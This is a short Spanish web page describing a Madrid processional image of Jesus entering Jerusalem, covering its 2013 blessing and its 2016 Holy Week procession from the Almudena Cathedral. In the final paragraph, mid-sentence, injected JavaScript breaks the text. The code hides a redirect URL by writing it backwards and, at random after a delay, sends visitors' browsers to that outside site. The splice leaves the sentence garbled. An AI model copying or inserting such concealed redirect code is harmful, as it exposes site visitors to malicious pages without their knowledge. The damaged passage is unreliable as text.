Nuestro Padre Jesús del Amor, Hdad. de la Borriquita, Madrid

Nuestro Padre Jesús del Amor, Hdad. de la Borriquita de Madrid, por Ramón Martín

Imagen de Jesús en su entrada triunfal en Jerusalén sobre un borriquillo, realizado en madera de cedro real y Bendecido en Madrid en Octubre de 2013 en la Iglesia de San Pascual.

Imagen que abre la semana santa de la Capital de España cada Domingo de Ramos. En la Semana santa de 2016 fue la primera imagen en presidir la misa de palmas organizada por la Diócesis de Madrid y oficiada por el excmo. Señor Arzobispo de Madrid D. Carlos Osoro, esa misma semana santa realizo su Estación de Penitencia desde la Santa Iglesia Catedral de la Almudena, siendo la primera imagen y hermandad en realizar tan echo histórico en la ciudad de Madrid y su semana santa.

Con los sucesivos años el señor del Amor ira acompañado de un conjunto escultórico compuesto por los Apóstoles Juan, Pedro y Santiago, tog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}una mujer hebrea, dos niños hebreos y un hombre del pueblo de Jerusalén.